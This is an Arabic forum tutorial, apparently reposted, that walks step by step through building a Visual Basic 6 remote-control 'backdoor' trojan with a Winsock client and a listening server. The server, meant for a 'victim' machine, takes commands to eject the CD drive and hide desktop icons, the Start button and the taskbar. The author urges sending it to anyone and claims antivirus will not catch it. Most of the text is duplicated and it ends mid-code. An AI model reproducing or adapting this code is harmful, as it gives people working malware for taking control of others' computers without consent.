يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع<br />
<br />
1. إجراء عملية الاتصال مع الخادم wskclient.Connect srvrip.Text, srvrport.Text<br />
<br />
2. عملية إرسال الأوامر إلى البرنامج الخادم &quot;wskclient.SendData &quot;openCD<br />
<br />
3. مراقبة حالة الاتصال wskclient.State = 0 <br />
أهم القيم المستخدمة في مراقبة حالة الاتصال<br />
<br />
0 &quot; لا يوجد اتصال &quot;<br />
<br />
7 &quot; تم الاتصال &quot;<br />
<br />
8 &quot; قام الخادم بقطع الاتصال &quot;<br />
<br />
9 &quot; خطأ في الاتصال &quot;<br />
<br />
تصميم البرنامج الخادم<br />
<br />
أولاً . . إدراج أداة MS WINSOCK للمشروع <br />
<br />
ثانياً . . كتابة الكود للبرنامج الخادم مع ملاحظة انه تم تعيين رقم المنفذ (2000) للبرنامج ويمكن تغييره في الكود لأي رقم آخر من 1 - 65535 <br />
<br />
ثالثاً . . تصميم البرنامج ليعمل تلقائياً بعد تشغيله <br />
كتابة شيفرة ( كود ) البرنامج الخادم [Server]<br />
<br />
يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع<br />
<br />
1. تحديد منفذ الاتصال wskServer.LocalPort = 2000 <br />
<br />
2. إجراء عملية الاتصال wskServer.Listen<br />
<br />
3. قبول طلب البرنامج العميل بالاتصال مع البرنامج الخادم <br />
<br />
Private Sub wskServer_ConnectionRequest(ByVal requestID As Long)<br />
<br />
If wskServer.State &lt;&gt; sckClosed Then<br />
<br />
wskServer.Close<br />
<br />
wskServer.Accept requestID<br />
<br />
End Sub<br />
<br />
<br />
عملية استقبال الأوامر من البرنامج العميل ( يتم تعريف متغير يقوم باستقبال الأوامر من العميل )<br />
<br />
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)<br />
<br />
Dim command As String<br />
<br />
wskServer.GetData command<br />
<br />
End Sub<br />
<br />
<br />
الحين نصممه خطوه بخطوه:<br />
----------------------------------------------------------------------------------<br />
----------------------------------------------------------------------------------<br />
هذا البرنامج يمثل برنامج العميل<br />
بستخدام تقنية tcp/ip<br />
----------------------------------------------------------------------------------<br />
----------------------------------------------------------------------------------<br />
الحين انشئ زر واسمه اتصال<br />
اوكتب هذا الكود<br />
Private Sub Command1_Click()<br />
wskclient.Close<br />
'يجب التأكد من أن الإتصال مغلق قبل عمل إتصال جديد<br />
If srvrip.Text = &quot;&quot; Then<br />
MsgBox &quot;IP يجب كتابة رقم&quot;<br />
Exit Sub<br />
End If<br />
If srvrport.Text = &quot;&quot; Then<br />
MsgBox &quot;يجب كتابة رقم المنفذ&quot;<br />
' يجب كتابة رقم منفذ<br />
Exit Sub<br />
End If<br />
If srvrport.Text &gt; 65535 Then<br />
MsgBox &quot;رقم المنفذ بين 1 - 65535&quot;<br />
' يجب التأكد من رقم المنفذ الصحيح<br />
Text2.Text = &quot;&quot;<br />
Exit Sub<br />
End If<br />
wskclient.Connect srvrip.Text, srvrport.Text<br />
'هذا السطر يمثل عملية الإتصال بالخادم<br />
'(Port)ورقم المنفذIP يتم الإتصال بالخادم عن طريق تحديد رقم<br />
'عند الضغط على زر &quot;إتصال&quot; يتم إجراء الإتصال<br />
Command1.Enabled = False<br />
'تعطيل زر &quot;اتصال&quot; عند اجراء الاتصال<br />
End Sub<br />
<br />
---------------------------------------------------------<br />
---------------------------------------------------------<br />
انشئ رز واسمه انهاء الاتصال<br />
واكتب هذا الكود<br />
Private Sub Command2_Click()<br />
wskclient.Close<br />
' &quot;يتم إغلاق الإتصال عند الضغط على زر &quot;انهاء الاتصال<br />
Command1.Enabled = True<br />
'تمكين الزر &quot;اتصال&quot; عند قطع الاتصال<br />
End Sub<br />
----------------------------------------------------------<br />
----------------------------------------------------------<br />
انشئ زر واسمه فتح سواقه الليزر<br />
واكتب هذا الكود<br />
Private Sub Command3_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;openCD&quot;<br />
End Sub<br />
---------------------------------------<br />
---------------------------------------<br />
انشئ زر واسمه اغلاق سواقه الليزر<br />
واكتب هذا الكود<br />
Private Sub Command4_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;closeCD&quot;<br />
End Sub<br />
----------------------------------------<br />
----------------------------------------<br />
انشئ زر واسمه اخفاء ايقونات سطح المكتب<br />
واكتب هذا الكود<br />
Private Sub Command5_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;hideDESKTOP&quot;<br />
End Sub<br />
-------------------------------------<br />
--------------------------------------<br />
انشئ زر واسمه اضهار ايقونات سطح المكتب<br />
واكتب هذا الكود<br />
Private Sub Command6_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;showDESKTOP&quot;<br />
End Sub<br />
--------------------------------------------<br />
--------------------------------------------<br />
انشئ زر واسمه اخفاء زر ابداء<br />
واكتب هذا الكود<br />
Private Sub Command8_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;hideSTART&quot;<br />
End Sub<br />
--------------------------------------------<br />
--------------------------------------------<br />
انشئ زر واسمه اضهار زر ابداء<br />
واكتب هذا الامر<br />
Private Sub Command9_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;showSTART&quot;<br />
End Sub<br />
------------------------------------------<br />
-----------------------------------------<br />
انشئ زر واسمه اخفاء شريط المهام<br />
واكتب هذا الكود<br />
Private Sub Command10_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;hideTASKBAR&quot;<br />
End Sub<br />
-----------------------------------------------<br />
-----------------------------------------------<br />
انشئ زر واسمه اضهار شريط المهام<br />
واكتب هذا الكود<br />
Private Sub Command11_Click()<br />
On Error Resume Next<br />
wskclient.SendData &quot;showTASKBAR&quot;<br />
End Sub<br />
----------------------------------------------<br />
----------------------------------------------<br />
الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك<br />
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال<br />
---------------------------------------------------------------------<br />
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram<br />
اوكتب هذا الكود فيه<br />
Private Sub Timer1_Timer()<br />
If wskclient.State = 0 Then status.Caption = &quot;لايوجد إتصال&quot;<br />
If wskclient.State = 6 Then status.Caption = &quot;جاري الإتصال&quot;<br />
If wskclient.State = 7 Then status.Caption = &quot;تم الإتصال مع الخادم&quot;<br />
If wskclient.State = 8 Then status.Caption = &quot;قام الخادم بقطع الإتصال&quot;<br />
If wskclient.State = 9 Then status.Caption = &quot;خطأ في الإتصال&quot;<br />
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم<br />
If wskclient.State &lt;&gt; sckConnected Then<br />
status.Caption = &quot;لايوجد إتصال&quot;<br />
End If<br />
End Sub<br />
-------------------------------<br />
------------------------------<br />
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي<br />
----------------------------------<br />
----------------------------------<br />
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه<br />
ip<br />
-----------------------------<br />
-----------------------------<br />
الحين انشئ text box وضعها امام label الذي سميناه ip<br />
------------------------------<br />
-----------------------------<br />
الحين انشئ label وسمه port <br />
-------------------------------------<br />
الحين انشئ text box وضعها امام label الي سميناه port<br />
--------------------------------------<br />
الحين انشئ label واتركه فارغا وضعه اسفل الفورم<br />
------------------------------------------------------------------<br />
------------------------------------------------------------------<br />
------------------------------------------------------------------<br />
الحين نكتب برنامج الخادم<br />
انشئ فورم جديد واكتب هذا الكود فيه<br />
Private Sub Form_Load()<br />
'wskServer اسم اداة الوينسوكت في هذا البرنامج<br />
wskServer.LocalPort = 2003<br />
' تعيين منفذ للخادم<br />
wskServer.Listen<br />
' بدء تشغيل الخادم<br />
TaskBarHwnd = FindWindow(&quot;Shell_traywnd&quot;, &quot;&quot;)<br />
' يقوم البرنامج بتحديد تعريف شريط المهام<br />
End Sub<br />
---------------------------------------<br />
---------------------------------------<br />
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub <br />
Private Sub wskServer_ConnectionRequest(ByVal requestID As Long)<br />
If wskServer.State &lt;&gt; sckClosed Then _<br />
wskServer.Close<br />
wskServer.Accept requestID<br />
' قبول طلب الاتصال<br />
End Sub<br />
<br />
'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ====<br />
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)<br />
Dim command As String<br />
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل<br />
wskServer.GetData command<br />
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل<br />
<br />
Select Case command ' تحديد الأمر القادم من البرنامج العميل<br />
Case &quot;openCD&quot; ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي<br />
CDOpen<br />
Case &quot;closeCD&quot;<br />
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي<br />
Case &quot;hideDESKTOP&quot; ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي<br />
Progman&amp; = FindWindow(&quot;Progman&quot;, vbNullString)<br />
SHELLDLLDefView&amp; = FindWindowEx(Progman&amp;, 0&amp;, &quot;SHELLDLL_DefView&quot;, vbNullString)<br />
SysListView&amp; = FindWindowEx(SHELLDLLDefView&amp;, 0&amp;, &quot;SysListView32&quot;, vbNullString)<br />
Call ShowWindow(SysListView&amp;, SW_HIDE)<br />
Case &quot;showDESKTOP&quot; ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي<br />
Progman&amp; = FindWindow(&quot;Progman&quot;, vbNullString)<br />
SHELLDLLDefView&amp; = FindWindowEx(Progman&amp;, 0&amp;, &quot;SHELLDLL_DefView&quot;, vbNullString)<br />
SysListView&amp; = FindWindowEx(SHELLDLLDefView&amp;, 0&amp;, &quot;SysListView32&quot;, vbNullString)<br />
Call ShowWindow(SysListView&amp;, SW_SHOW)<br />
Case &quot;hideSTART&quot; ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي<br />
HideStartButton<br />
Case &quot;showSTART&quot; ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي<br />
ShowStartButton<br />
Case &quot;hideTASKBAR&quot; ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي<br />
Call SetWindowPos(TaskBarHwnd, 0&amp;, 0&amp;, 0&amp;, 0&amp;, 0&amp;, SWP_HIDEWINDOW)<br />
Case &quot;showTASKBAR&quot; ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي<br />
Call SetWindowPos(TaskBarHwnd, 0&amp;, 0&amp;, 0&amp;, 0&amp;, 0&amp;, SWP_SHOWWINDOW)<br />
End Select<br />
<br />
End Sub<br />
<br />
--------------------------<br />
---------------------------<br />
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون<br />
---------------------------------------------<br />
----------------------------------------------<br />
الحين انشئ موديل واكتب هذا الكود فيها<br />
<br />
' API CALLS<br />
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم<br />
<br />
Public Declare Function mciSendString Lib &quot;winmm.dll&quot; Alias &quot;mciSendStringA&quot; (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long<br />
Public Declare Function ShowWindow Lib &quot;user32&quot; (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long<br />
Public Declare Function FindWindow Lib &quot;user32&quot; Alias &quot;FindWindowA&quot; (ByVal lpClassName As String, ByVal lpWindowName As String) As Long<br />
Public Declare Function FindWindowEx Lib &quot;user32&quot; Alias &quot;FindWindowExA&quot; (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long<br />
Public Declare Function SetWindowPos Lib &quot;user32&quot; (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long<br />
<br />
Public Const SW_HIDE = 0<br />
Public Const SW_SHOW = 5<br />
<br />
Const SWP_HIDEWINDOW = &amp;H80<br />
Const SWP_SHOWWINDOW = &amp;H40<br />
'دالة اخفاء زر ابدأ<br />
Sub HideStartButton()<br />
Dim Handle As Long, FindClass As Long<br />
FindClass&amp; = FindWindow(&quot;Shell_TrayWnd&quot;, &quot;&quot;)<br />
Handle&amp; = FindWindowEx(FindClass&amp;, 0, &quot;Button&quot;, vbNullString)<br />
ShowWindow Handle&amp;, 0<br />
End Sub<br />
' دالة اظهار زر ابدأ<br />
Sub ShowStartButton()<br />
Dim Handle As Long, FindClass As Long<br />
FindClass&amp; = FindWindow(&quot;Shell_TrayWnd&quot;, &quot;&quot;)<br />
Handle&amp; = FindWindowEx(FindClass&amp;, 0, &quot;Button&quot;, vbNullString)<br />
ShowWindow Handle&amp;, 1<br />
End Sub<br />
<br />
'دالة اغلاق سواقة الليزر<br />
Sub CDClose()<br />
retvalue = mciSendString(&quot;set CDAudio door closed&quot;, returnstring, 127, 0)<br />
End Sub<br />
<br />
'دالة فتح سواقة الليزر<br />
Sub CDOpen()<br />
retvalue = mciSendString(&quot;set CDAudio door open&quot;, returnstring, 127, 0)<br />
End Sub<br />
-----------------------------------<br />
-----------------------------------<br />
الحين سلامتك البرنامج الباكدور الي سويناه ارسلة لاي شخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه<br />
والبرنامج الي عندك راح تتحكم فيه<br />
<br />
<br />
<br />
وهذا ايضا موضوع اخر في صناعة برامج الهكر<br />
<br />
<br />
<br />
اصنع برنامج هاكر بنفسك....بالفجول بسك:::منقول<br />
ملحوظه مهمة: الرجاء عدم استخدام اي برنامج من صنعك او من صنع غيرك ضد المسلمين والهكر العربي بريئ من الذي يفعل ذلك الى يوم الدين والان نبدا الموضوع خطوة بخطوة<br />
<br />
<br />
الجزئ الاول <br />
+++=(كيف تصمم برنامج اختراق بنفسك)=+++ <br />
..............سوف نتحدث إن شاء الله عن فكرة برمجة برامج الاختراق الشهيرة وكيف تتم برمجتها وتشغيلها ثم سوف نقوم بعمل برنامج بالفيجوال بيسك وذلك لتوضيح الموضوع واستيعابه بشكل أفضل.... <br />
حسناً . . لنبدأ الآن بشرح تفاصيل الموضوع وعلى بركة الله: <br />
تتكون هذه البرامج كما هو معروف من جزئين أو برنامجين يسمى الأول بملف العميل والآخر ملف الخادم <br />
1- <br />
كيفية الاتصال بين الملفين عبر الانترنت <br />
يتم الاتصال بين الملفين العميل والخادم باستخدام بروتوكول tcp/ip <br />
<br />
حيث يتم الاتصال بين الملفين العميل والخادم بمعرفة رقم الايبي ورقم المنفذ للبرنامج الخادم على جهاز الضحية <br />
<br />
بالنسبة لرقم الايبي للخادم فهو رقم الايبي الخاص بجهاز الضحية عند دخوله على شبكة الانترنت <br />
<br />
أما بالنسبة لرقم المنفذ فيتم تحديده برمجياً أثناء عمل البرنامج ولا يمكن تعديله إذا تم وضعه في جهاز الضحية وهو رقم يتراوح بين 1 إلى 65535 تقريباً <br />
وإذا اضطر الأمر لتعديل رقم المنفذ فيجب زرع نسخة جديدة من ملف الخادم في جهاز الضحية مرة أخرى بعد التعديل <br />
عندما يبدأ برنامج الخادم بالعمل عند تشغيله يقوم بعمل خط اتصال وينتظر أي طلب اتصال قادم من الانترنت <br />
<br />
في هذه الحالة يقوم الشخص الذي يملك البرنامج العميل ويعرف رقم الايبي ورقم المنفذ الصحيح بالخادم بعمل اتصال مع الخادم ويكتمل الاتصال بين الجهازين بعد ذلك يبدأ برنامج العميل بإرسال الأوامر ويقوم الخادم باستقبال هذه الأوامر وتنفيذ المطلوب منه ثم يقوم بإرسال نتائج الأوامر مرة أخرى إلى العميل <br />
هذه هي الفكرة ببساطة شديدة أرجو أن تكون واضحة للجميع <br />
<br />
2-خطوات عمل برنامج بالفيجوال بيسك للتجسس . <br />
برنامج العميل <br />
كما ذكرنا بخصوص العميل فهو الذي يتحكم بالعملية كلها وهو الذي يرسل الأوامر للبرنامج الخادم وسوف نقوم الآن بشرح خطوات تنفيذ برنامج عميل <br />
<br />
الخطوة الأولى : معرفة رقم الايبي ورقم المنفذ للبرنامج الخادم وإجراء الاتصال <br />
<br />
الخطوة الثانية : ينتظر البرنامج السماح بالاتصال من البرنامج الخادم ثم يتم الاتصال بين الجهازين <br />
<br />
الخطوة الثالثة : يقوم البرنامج بإرسال الأوامر للبرنامج الخادم والذي بدوره يقوم بالرد بالمعلومات المطلوبة . <br />
<br />
برنامج الخادم <br />
<br />
يقوم هذا البرنامج بعمل اتصال بالانترنت وينتظر أي طلب اتصال معه وإذا قام برنامج العميل بكتابة رقم الايبي ورقم المنفذ الصحيح فانه يتم الاتصال بين الطرفين ويبدأ البرنامج الخادم باستقبال الأوامر من البرنامج العميل المتصل به وينفذ ما هو مطلوب منه على جهاز الضحية مثل تنفيذ بعض الأعمال التخريبية أو قراءة معلومات خاصة وإرسالها للبرنامج العميل. <br />
سنقوم الآن بتصميم برنامج صغير لتوضيح فكرة إرسال الأوامر إلى البرنامج الخادم واستقبال البرنامج الخادم لهذه الأوامر وتنفيذها <br />
<br />
البرنامج كما ذكرنا سابقا يتكون من جزئين برنامج عميل وبرنامج خادم <br />
<br />
..................... <br />
تصميم البرنامج العميل <br />
أولا . . يتم إدراج أداة MS WINSOCK للمشروع ويتم تغيير اسم الأداة إلى wskclient <br />
<br />
ثانياً . . يتم إدراج TIMER <br />
<br />
ثالثاً . . يتم وضع أزارير لعملية الاتصال وقطع الاتصال <br />
<br />
رابعاً . . يتم ادراج 2 مربع نص لكتابة رقم الايبي ورقم المنفذ srvrip.Text srvrport.Text <br />
<br />
خامساً . . يتم وضع أزارير للأوامر المراد إرسالها للبرنامج الخادم <br />
كتابة شيفرة ( كود ) البرنامج العميل [Client] <br />
<br />
يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع <br />
<br />
1. إجراء عملية الاتصال مع الخادم wskclient.Connect srvrip.Text, srvrport.Text <br />
<br />
2. عملية إرسال الأوامر إلى البرنامج الخادم &quot;wskclient.SendData &quot;openCD <br />
<br />
3. مراقبة حالة الاتصال wskclient.State = 0 <br />
أهم القيم المستخدمة في مراقبة حالة الاتصال <br />
<br />
0 &quot; لا يوجد اتصال &quot; <br />
<br />
7 &quot; تم الاتصال &quot; <br />
<br />
8 &quot; قام الخادم بقطع الاتصال &quot; <br />
<br />
9 &quot; خطأ في الاتصال &quot; <br />
<br />
تصميم البرنامج الخادم <br />
<br />
أولاً . . إدراج أداة MS WINSOCK للمشروع <br />
<br />
ثانياً . . كتابة الكود للبرنامج الخادم مع ملاحظة انه تم تعيين رقم المنفذ (2000) للبرنامج ويمكن تغييره في الكود لأي رقم آخر من 1 - 65535 <br />
<br />
ثالثاً . . تصميم البرنامج ليعمل تلقائياً بعد تشغيله <br />
كتابة شيفرة ( كود ) البرنامج الخادم [Server] <br />
<br />
يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع <br />
<br />
1. تحديد منفذ الاتصال wskServer.LocalPort = 2000 <br />
<br />
2. إجراء عملية الاتصال wskServer.Listen <br />
<br />
3. قبول طلب البرنامج العميل بالاتصال مع البرنامج الخادم <br />
<br />
Private Sub wskServer_ConnectionRequest(By<br />
Val requestID As Long) <br />
<br />
If wskServer.State &lt;&gt; sckClosed Then <br />
<br />
wskServer.Close <br />
<br />
wskServer.Accept requestID <br />
<br />
End Sub <br />
<br />
<br />
عملية استقبال الأوامر من البرنامج العميل ( يتم تعريف متغير يقوم باستقبال الأوامر من العميل ) <br />
<br />
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long) <br />
<br />
Dim command As String <br />
<br />
wskServer.GetData command <br />
<br />
End Sub <br />
...................... <br />
....................... <br />
الحين نصممه خطوه بخطوه: <br />
---------------------------------------------------------------------------------- <br />
---------------------------------------------------------------------------------- <br />
هذا البرنامج يمثل برنامج العميل <br />
بستخدام تقنية tcp/ip <br />
---------------------------------------------------------------------------------- <br />
---------------------------------------------------------------------------------- <br />
الحين انشئ زر واسمه اتصال <br />
اوكتب هذا الكود <br />
Private Sub Command1_Click() <br />
wskclient.Close <br />
'يجب التأكد من أن الإتصال مغلق قبل عمل إتصال جديد <br />
If srvrip.Text = &quot;&quot; Then <br />
MsgBox &quot;IP يجب كتابة رقم&quot; <br />
Exit Sub <br />
End If <br />
If srvrport.Text = &quot;&quot; Then <br />
MsgBox &quot;يجب كتابة رقم المنفذ&quot; <br />
' يجب كتابة رقم منفذ <br />
Exit Sub <br />
End If <br />
If srvrport.Text &gt; 65535 Then <br />
MsgBox &quot;رقم المنفذ بين 1 - 65535&quot; <br />
' يجب التأكد من رقم المنفذ الصحيح <br />
Text2.Text = &quot;&quot; <br />
Exit Sub <br />
End If <br />
wskclient.Connect srvrip.Text, srvrport.Text <br />
'هذا السطر يمثل عملية الإتصال بالخادم <br />
'(Port)ورقم المنفذIP يتم الإتصال بالخادم عن طريق تحديد رقم <br />
'عند الضغط على زر &quot;إتصال&quot; يتم إجراء الإتصال <br />
Command1.Enabled = False <br />
'تعطيل زر &quot;اتصال&quot; عند اجراء الاتصال <br />
End Sub <br />
<br />
--------------------------------------------------------- <br />
--------------------------------------------------------- <br />
انشئ رز واسمه انهاء الاتصال <br />
واكتب هذا الكود <br />
Private Sub Command2_Click() <br />
wskclient.Close <br />
' &quot;يتم إغلاق الإتصال عند الضغط على زر &quot;انهاء الاتصال <br />
Command1.Enabled = True <br />
'تمكين الزر &quot;اتصال&quot; عند قطع الاتصال <br />
End Sub<br />
<br />
<br />
الجزئ الثاني <br />
<br />
---------------------------------------------------------- <br />
انشئ زر واسمه فتح سواقه الليزر <br />
واكتب هذا الكود <br />
Private Sub Command3_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;openCD&quot; <br />
End Sub <br />
--------------------------------------- <br />
--------------------------------------- <br />
انشئ زر واسمه اغلاق سواقه الليزر <br />
واكتب هذا الكود <br />
Private Sub Command4_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;closeCD&quot; <br />
End Sub <br />
---------------------------------------- <br />
---------------------------------------- <br />
انشئ زر واسمه اخفاء <br />
ايقونات سطح المكتب <br />
واكتب هذا الكود <br />
Private Sub Command5_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;hideDESKTOP&quot; <br />
End Sub <br />
------------------------------------- <br />
-------------------------------------- <br />
انشئ زر واسمه اضهار ايقونات سطح المكتب <br />
واكتب هذا الكود <br />
Private Sub Command6_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;showDESKTOP&quot; <br />
End Sub <br />
-------------------------------------------- <br />
-------------------------------------------- <br />
انشئ زر واسمه اخفاء زر ابداء <br />
واكتب هذا الكود <br />
Private Sub Command8_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;hideSTART&quot; <br />
End Sub <br />
-------------------------------------------- <br />
-------------------------------------------- <br />
انشئ زر واسمه اضهار زر ابداء <br />
واكتب هذا الامر <br />
Private Sub Command9_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;showSTART&quot; <br />
End Sub <br />
------------------------------------------ <br />
----------------------------------------- <br />
انشئ زر واسمه اخفاء شريط المهام <br />
واكتب هذا الكود <br />
Private Sub Command10_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;hideTASKBAR&quot; <br />
End Sub <br />
----------------------------------------------- <br />
----------------------------------------------- <br />
انشئ زر واسمه اضهار شريط المهام <br />
واكتب هذا الكود <br />
Private Sub Command11_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;showTASKBAR&quot; <br />
End Sub <br />
---------------------------------------------- <br />
<br />
الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك <br />
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال <br />
--------------------------------------------------------------------- <br />
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram <br />
اوكتب هذا الكود فيه <br />
Private Sub Timer1_Timer() <br />
If wskclient.State = 0 Then status.Caption = &quot;لايوجد إتصال&quot; <br />
If wskclient.State = 6 Then status.Caption = &quot;جاري الإتصال&quot; <br />
If wskclient.State = 7 Then status.Caption = &quot;تم الإتصال مع الخادم&quot; <br />
If wskclient.State = 8 Then status.Caption = &quot;قام الخادم بقطع الإتصال&quot; <br />
If wskclient.State = 9 Then status.Caption = &quot;خطأ في الإتصال&quot; <br />
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم <br />
If wskclient.State &lt;&gt; sckConnected Then <br />
status.Caption = &quot;لايوجد إتصال&quot; <br />
End If <br />
End Sub <br />
------------------------------- <br />
------------------------------ <br />
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي <br />
---------------------------------- <br />
---------------------------------- <br />
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه <br />
ip <br />
----------------------------- <br />
----------------------------- <br />
الحين انشئ text box وضعها امام label الذي سميناه ip <br />
------------------------------ <br />
----------------------------- <br />
الحين انشئ label وسمه port <br />
------------------------------------- <br />
الحين انشئ text box وضعها امام label الي سميناه port <br />
-------------------------------------- <br />
الحين انشئ label واتركه فارغا وضعه اسفل الفورم <br />
------------------------------------------------------------------ <br />
------------------------------------------------------------------ <br />
------------------------------------------------------------------ <br />
الحين نكتب برنامج الخادم <br />
انشئ فورم جديد واكتب هذا الكود فيه <br />
Private Sub Form_Load() <br />
'wskServer اسم اداة الوينسوكت في هذا البرنامج <br />
wskServer.LocalPort = 2003 <br />
' تعيين منفذ للخادم <br />
wskServer.Listen <br />
' بدء تشغيل الخادم <br />
TaskBarHwnd = FindWindow(&quot;Shell_traywnd&quot;, &quot;&quot;) <br />
' يقوم البرنامج بتحديد تعريف شريط المهام <br />
End Sub <br />
--------------------------------------- <br />
--------------------------------------- <br />
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub <br />
Private Sub wskServer_ConnectionRequest(By<br />
Val requestID As Long) <br />
If wskServer.State &lt;&gt; sckClosed Then _ <br />
wskServer.Close <br />
wskServer.Accept requestID <br />
' قبول طلب الاتصال <br />
End Sub <br />
<br />
'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ==== <br />
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long) <br />
Dim command As String <br />
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل <br />
wskServer.GetData command <br />
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل <br />
<br />
Select Case command ' تحديد الأمر القادم من البرنامج العميل <br />
Case &quot;openCD&quot; ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي <br />
CDOpen <br />
Case &quot;closeCD&quot; <br />
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي <br />
Case &quot;hideDESKTOP&quot; ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي <br />
Progman&amp; = FindWindow(&quot;Progman&quot;, vbNullString) <br />
SHELLDLLDefView&amp; = FindWindowEx(Progman&amp;, 0&amp;, &quot;SHELLDLL_DefView&quot;, vbNullString) <br />
SysListView&amp; = FindWindowEx(SHELLDLLDefView&amp;, 0&amp;, &quot;SysListView32&quot;, vbNullString) <br />
Call ShowWindow(SysListView&amp;, SW_HIDE) <br />
Case &quot;showDESKTOP&quot; ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي <br />
Progman&amp; = FindWindow(&quot;Progman&quot;, vbNullString) <br />
SHELLDLLDefView&amp; = FindWindowEx(Progman&amp;, 0&amp;, &quot;SHELLDLL_DefView&quot;, vbNullString) <br />
SysListView&amp; = FindWindowEx(SHELLDLLDefView&amp;, 0&amp;, &quot;SysListView32&quot;, vbNullString) <br />
Call ShowWindow(SysListView&amp;, SW_SHOW) <br />
Case &quot;hideSTART&quot; ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي <br />
HideStartButton <br />
Case &quot;showSTART&quot; ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي <br />
ShowStartButton <br />
